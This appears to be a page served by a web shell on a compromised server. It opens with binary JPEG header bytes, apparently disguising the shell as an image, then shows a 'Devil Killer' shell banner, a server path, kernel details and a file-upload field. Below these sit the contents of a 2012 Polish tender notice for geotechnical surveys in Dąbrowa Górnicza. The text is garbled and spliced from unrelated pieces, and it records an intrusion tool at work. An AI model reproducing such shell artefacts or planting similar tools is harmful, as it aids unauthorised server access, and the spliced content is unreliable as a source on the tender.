JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121011/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121011/394178-N-2012.html

<p class="kh_header"><b>Dąbrowa Górnicza: Kompleksowe badania geotechniczne dla terenu Hałda Jadwiga i terenu Kazdębie
w ramach zadania inwestycyjnego p.n.
Aktywizacja ekonomiczna obszarów poprzemysłowych -  Hałda Jadwiga i Kazdębie w Dąbrowie Górniczej</b><br>
<b>Numer ogłoszenia: 394178 - 2012; data zamieszczenia: 11.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dąbrowa Górnicza , ul. Graniczna 21, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 32 2956700, faks 32 2625032, 2956700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.dabrowa-gornicza.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowe badania geotechniczne dla terenu Hałda Jadwiga i terenu Kazdębie
w ramach zadania inwestycyjnego p.n.
Aktywizacja ekonomiczna obszarów poprzemysłowych -  Hałda Jadwiga i Kazdębie w Dąbrowie Górniczej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.   Postępowanie o udzielenie zamówienia prowadzone w trybie przetargu nieograniczonego na podstawie ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz.U. z 2010r., Nr 113, poz. 759 z późn. zm.) o wartości zamówienia poniżej 200.000,00 EUR.
II.   Opis przedmiotu zamówienia:
Zamówienie obejmuje 2 zadania tj:  
Zadanie I : Kompleksowe badania geotechniczne dla terenu Hałda Jadwiga 
Zadanie II. Kompleksowe badania geotechniczne dla terenu Kazdębie,
które zlecone zostaną w ramach jednego zamówienia. 
1.  Zadanie I : Kompleksowe badania geotechniczne dla terenu Hałda Jadwiga 
Badaniom zostanie poddany poprzemysłowy obszar: Hałda Jadwiga stanowiąca pozostałość po działalności górnictwa węgla kamiennego (kopalnia Paryż) w sąsiedztwie ul. Limanowskiego. Hałda powstała w latach 60. ubiegłego wieku, obejmuje obszar działek o nr: 2/3 (pow. 118174m2), 2/6 (pow. 299 m2 ), 2/7 (pow. 540 m2), karta mapy: 52 . Powierzchnia łączna hałdy 119 013 m2.
1.1.	Badania geofizyczne:
-mikrograwimetria w siatce kwadratów 50 x 50 m zwałowanego odpadu i podłoża,  z zagęszczeniem w rejonie szybu w kwadracie 20 x 20 m w siatce kwadratów 5 x 5 m 
1.2.	Wiercenia w siatce kwadratów minimum 1 otwór na hektar o głębokości średnio 20 m, przy czym otwór powinien być zakończony w gruntach nośnych o miąższości minimum 5 m, minimum 12 szt. otworów, lokalizacja otworów zostanie dostosowana do wyników badań geofizycznych (wiercenia w rejonie stwierdzonych anomalii), wraz z poborem prób gruntów, prób wody, prowadzeniem obserwacji poziomu wodonośnego.
1.3.	Badania polowe in situ gruntów sondą bardzo ciężką w celu określenia stopnia zagęszczenia, minimum 5 sond.
1.4.Badania laboratoryjne prób:
a)	parametry fizyczne: wilgotność naturalna, gęstość objętościowa, korozyjność gruntu, granica Atteberga, analiza uziarnienia
b)	parametry chemiczne:
-	zanieczyszczenia gruntów -nasypów: chrom całkowity, cyna, cynk, kadm, kobalt, miedź, molibden, nikiel, ołów, rtęć, odczyn (pH), węglowodory ropopochodne C12-C35, suma węglowodorów aromatycznych, min 6 próbek (3 próbki z głębokości 0-2m i 3 próbki z głębokości 2 -15 m) 
-	wyciągów wodnych: kadm, chrom całkowity, miedź, rtęć, molibden, nikiel, ołów, cynk, cyna, fluorki, siarczany, chlorki, rozpuszczony węgiel organiczny (DOC), stałe związki rozpuszczone (TDS), odczyn (pH), min 6 próbek (3 próbki z głębokości 0-2m i 3 próbki z głębokości 2 -15 m) 
c)	parametry paliwowe: ciepło spalania, wartość opałowa, popiół, ciężar objętościowy, siarka, chlor, minimum 10 próbek odpadu
d)	zawartości węgla w zdeponowanych odpadach, min 10 próbek odpadu
e)	zdolności zdeponowanych odpadów do samozapłonu, min 5 próbek
Próbki do badań laboratoryjnych powinny mieć jakość zgodną z Polską Normą PN-EN 1997-2 Eurokod 7: Projektowanie geotechniczne - Część 2: Rozpoznanie i badanie podłoża gruntowego i powinny być pobierane w trakcie wierceń, za pomocą odpowiednich próbników.
1.5.	Badania chemiczne jakości wód podziemnych - 2 próbki.
1.6.	Prace geodezyjne, określenie rzędnych bezwzględnych terenu (m n.p.m.) otworów badawczych, sporządzenie operatu geodezyjnego zwału, określenie jego ukształtowania: w tym rzędne, objętość i pole powierzchni zwału.
1.7.	Opracowanie dotyczące prezentacji i oceny wyników :
-	ocena badań geotechnicznych, opinia geotechniczna powinna ustalać przydatność gruntów na potrzeby budownictwa oraz wskazywać kategorię geotechniczną obiektu budowlanego i określać warunki posadowienia obiektów 
-	ocena zdolności zdeponowanych odpadów do samozapłonu
-	ocena właściwości ekotoksycznych odpadów
( z wykorzystaniem we wnioskach również danych o otworach badawczych jak w opracowaniu z 2008r. pt. Sprawozdanie z badań zwałowiska Jadwiga w Dąbrowie Górniczej w celu określenia możliwości i sposobu wykorzystania zdeponowanych tam odpadów pogórniczych, autorstwa Ośrodka Badania i Kontroli Środowiska  Katowice - stanowiącego załącznik nr 7  do SIWZ)
2.	Zadanie II. Kompleksowe badania geotechniczne dla terenu Kazdębie:
Teren położony jest w sąsiedztwie ul. Koksowniczej, drogi nr 790 i obejmuje działki nr 2274/1 (pow. 39 698 m2), 2274/2 (pow. 28 654 m2),  2274/3 pow. (30 373 m2) k.m. 6, działka nr 71/5 (pow. 4 798 m2) k.m. 2. Powierzchnia łączna 103 523 m2.
2.1.	Wiercenia:
-	wykonane w siatce kwadratów minimum 1 otwór na hektar, do głębokości średnio 20 m, przy czym otwór powinien być zakończony w gruntach nośnych o miąższości minimum 5 m, minimum 11 szt. otworów, wraz z poborem prób gruntów, prób wody, prowadzeniem obserwacji poziomu wodonośnego.
2.2. 	Badania polowe in situ gruntów:
	a) gruntów niespoistych sondą dynamiczną
	b) gruntów spoistych sondą statyczną
minimum 11 sond
2.3.	 Badania laboratoryjne prób:
	a) parametry fizyczne: wilgotność naturalna, gęstość objętościowa, korozyjność gruntu, granica Atteberga, analiza uziarnienia
	b) parametry chemiczne:
-	zanieczyszczenia gruntów -nasypów: chrom całkowity, cyna, cynk, kadm, kobalt, miedź, molibden, nikiel, ołów, rtęć, odczyn (pH), węglowodory ropopochodne C12-C35, suma węglowodorów aromatycznych, min 20 próbek (10 próbek z głębokości 0-2m i 10 próbek z głębokości 2 -15 m) 
-	wyciągów wodnych: kadm, chrom całkowity, miedź, rtęć, molibden, nikiel, ołów,  cynk, cyna, fluorki, siarczany, chlorki, rozpuszczony węgiel organiczny (DOC), stałe związki rozpuszczone (TDS), odczyn (pH), min 20 próbek (10 próbek z głębokości 0-2m i 10 próbek z głębokości 2 -15 m) 
Próbki do badań laboratoryjnych powinny mieć jakość zgodną z Polską Normą PN-EN 1997-2 Eurokod 7: Projektowanie geotechniczne - Część 2: Rozpoznanie i badanie podłoża gruntowego i powinny być pobierane w trakcie wierceń, za pomocą odpowiednich próbników.
2.4.	Badania chemiczne jakości wód podziemnych 2 próbki.
2.5.	Prace geodezyjne, określenie rzędnych bezwzględnych terenu (m n.p.m.) otworów badawczych, sporządzenie operatu geodezyjnego zwału, określenie jego ukształtowania: w tym rzędne, objętość i pole powierzchni zwału.
2.6.	Wskazanie na terenie nieruchomości przebiegu trasy istniejących urządzeń podziemnych i nadziemnych oraz wskazanie rodzaju przesyłanego medium, poprzez ewentualne: prace polowe, przekopy kontrolne, badania urządzeniami elektromagnetycznymi w przypadku gdy ustalenie właściciela, eksploatatora nie będzie możliwe na podstawie uzgodnień branżowych.
2.7.	Opracowanie dotyczące prezentacji i oceny wyników :
-        ocena badań geotechnicznych, opinia geotechniczna powinna ustalać przydatność gruntów na potrzeby budownictwa oraz wskazywać kategorię geotechniczną obiektu budowlanego i określać warunki posadowienia obiektów
-        ocena wpływu na środowisko zdeponowanych nasypów
3.	Opracowania dla terenu  Hałda Jadwiga oraz dla terenu Kazdębie należy sporządzić osobno dla każdego zadania po 4 egz. w wersji papierowej, 2 egz. w wersji cyfrowej, tzn. w formie elektronicznej na optycznym nośniku danych (płyta CD) w formie plików w formacie *.xls, *.doc obsługiwanych przez Word 2000 oraz pdf zabezpieczonych przed zmianami i umożliwiających przesłanie dokumentacji drogą elektroniczną. Niezależnie od dokumentacji wymienionej wyżej Wykonawca wykona i poniesie koszt dla dokumentacji potrzebnej do uzgodnień.
Wykonawca zobowiązany jest do informowania Zamawiającego o postępie prac.
Wykonawca zobowiązany jest do umieszczenia na opracowaniach obowiązujących znaków graficznych logotypu Programu Innowacyjna Gospodarka oraz flagi Unii  Europejskiej. 
4.	W ramach zamówienia Wykonawca zobowiązany jest do uczestnictwa w naradach   z Zamawiającym w terminach uzgodnionych z Zamawiającym również po zakończeniu realizacji zadania.
5.	Na stronie BIP Zamawiającego udostępnione są następujące materiały w wersji elektronicznej: 
5.1.	Uchwała Nr XLII/795/05 Rady Miejskiej w Dąbrowie Górniczej z dnia 31 maja 2005r. roku w sprawie: Miejscowego planu zagospodarowania przestrzennego miasta Dąbrowa Górnicza dla terenów położonych w rejonie Strzemieszyc Małych i Kazdębia.
5.2.	Uchwała Nr V/45/11 Rady Miejskiej w Dąbrowie Górniczej z dnia 02 lutego 2011 roku w sprawie: Miejscowego planu zagospodarowania przestrzennego miasta Dąbrowa Górnicza dla terenów położonych w rejonie linii kolejowej PKP Katowice - Warszawa, ulic: Limanowskiego, Konopnickiej, Górników Edenu, Królowej Jadwigi, Sobieskiego do granicy administracyjnej z Będzinem.
6.	Wykonawca przenosi nieodpłatnie całość majątkowych praw autorskich wynikających z przedmiotu niniejszej umowy na Gminę Dąbrowa Górnicza z chwilą wydania przedmiotu umowy Zamawiającemu na następujących polach eksploatacji:
-	w zakresie utrwalania i zwielokrotniania,
-	w zakresie obrotu oryginałem albo egzemplarzami, na których go utrwalono,
-	w zakresie rozpowszechniania - udostępnianie w taki sposób, aby każdy zainteresowany mógł mieć do niego dostęp.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust.1 pkt  6 Ustawy. Realizacja zamówień uzupełniających odbywać się będzie w zakresie przewidzianym  przedmiotem zamówienia i określonym kodami CPV. Wartość szacunkowa zamówień uzupełniających nie przekroczy 50% wartości zamówienia  podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.33.20.00-4, 71.35.11.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 22.01.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu jest zobowiązany wnieść wadium w wysokości   4. 000,00 zł (słownie: cztery tysiące złotych) w formach określonych w art. 45 ust. 6 Ustawy na zasadach określonych w pkt. 11 SIWZ.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 Ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia- nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że: w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, należycie wykonał usługi w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia, t.j.: 
-	minimum 1 usługę wykonania kompleksowych badań geotechnicznych o powierzchni minimum 10 ha i  o wartości minimum 40 000 PLN brutto 
-          minimum 1 usługę wykonania kompleksowych badań geotechnicznych zwałowisk odpadów poprzemysłowych o powierzchni minimum 10 ha o wartości minimum 40 000 PLN brutto.
Uwaga:
1.	Jeżeli zakres usług  przedstawionych w dokumencie złożonym na potwierdzenie, że usługi zostały wykonane/są wykonywane należycie jest szerszy od powyżej określonego należy w wykazie podać wartość usług odpowiadających zakresowi warunku udziału w postępowaniu. 
2.	Równowartość w złotych zadań rozliczanych w walutach obcych zostanie określona według średniego kursu złotego w stosunku do walut obcych ogłoszonego przez NBP obowiązującego w dniu, w którym opublikowane zostało ogłoszenie o niniejszym zamówieniu w Biuletynie Zamówień Publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 Ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia- nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony jeżeli Wykonawca wykaże, że dysponuje: 
-	specjalistą w zakresie ochrony środowiska,
-	specjalistą w zakresie geologii i geotechniki, posiadającym odpowiednią kategorię kwalifikacji w zakresie wykonywania prac ustaloną w ustawie Prawo geologiczne   i górnicze
-	specjalistą w zakresie geodezji posiadającym uprawnienia zawodowe w zakresie 1 zgodnie   z ustawą Prawo geodezyjne i kartograficzne.
(min. po 1 osobie z każdej specjalności). 
Dopuszcza się możliwość łączenia funkcji w przypadku posiadania więcej niż jednego uprawnienia przez daną osobę.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Zamawiający żąda złożenia oświadczenia z art. 22 ust. 1 Ustawy i jego weryfikacja zostanie przeprowadzona wg formuły: spełnia- nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy - załącznik nr 1 do SIWZ (wskazana data podpisania);
2. Pełnomocnictwo do reprezentowania Wykonawcy - jeżeli zostało ustanowione bądź do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie przedłożone w formie oryginału lub kopii poświadczonej przez notariusza (dotyczy również spółki cywilnej);
3. Zobowiązanie innych podmiotów, w szczególności pisemne, do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, wymagane w przypadku, gdy Wykonawca polega na ich zasobach na zasadach określonych w 	art. 26 ust. 2b  Ustawy. Wskazane jest aby zobowiązanie obejmowało:  
a)	dane pozwalające na identyfikację stron 
b)	zakres udostępniania (w zakresie wiedzy i doświadczenia, potencjału technicznego, osób zdolnych do wykonania zamówienia i sytuacji finansowej) oraz jego podstawa (np. umowa 	przedwstępna przyrzekająca zawarcie umowy o udostępnienie, umowy o podwykonawstwo, o 	współpracy, porozumienie o delegowaniu pracowników, umowa o świadczenie usług doradczych, know-how i inne umowy nienazwane) 
c)	cel i czas udostępnienia (obejmujący okres realizacji zamówienia).
4.     Potwierdzenie wniesienia wadium</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy:
1.1. w zakresie zmiany terminu wykonania zamówienia, w następujących przypadkach:
a/ wystąpienia siły wyższej. Siła wyższa oznacza wydarzenie nieprzewidywalne i poza kontrolą stron niniejszej umowy, występujące po podpisaniu umowy, a powodujące niemożliwość wywiązania się z umowy w jej obecnym brzmieniu,
b/  wystąpienia nietypowych dla klimatu polskiego warunków atmosferycznych uniemożliwiających prowadzenie zamówień/usług zgodnie z technologią ich wykonania, np. gradobicia, trąby powietrzne , zjawiska niestandardowe w klimacie polskim,   
c/ konieczności wykonania zamówień dodatkowych, o których mowa w art. 67 ust. 1 pkt. 5 ustawy, których wykonanie jest niezbędne dla prawidłowego wykonania oraz zakończenia podstawowego przedmiotu zamówienia wraz ze wszystkimi konsekwencjami występującymi w związku  z przedłużeniem tego terminu, 
d/ zmiany przepisów prawa Unii Europejskiej lub prawa krajowego, co powoduje konieczność dostosowania dokumentacji do zmiany przepisów, które nastąpiły w trakcie realizacji zamówienia,
e/ opóźnień instytucji dokonujących uzgodnień branżowych w związku z ustaleniem trasy i medium urządzeń podziemnych i nadziemnych zlokalizowanych na przedmiotowym terenie z przyczyn nie leżących po stronie Wykonawcy.
1.2. W pozostałym zakresie zmiany do umowy mogą dotyczyć następujących okoliczności:
a/ zmiany przepisów prawa  istotnych dla  postanowień  zawartej umowy, 
b/ rezygnacji z całości lub części zamówienia zgodnie z art. 145 Ustawy Pzp,
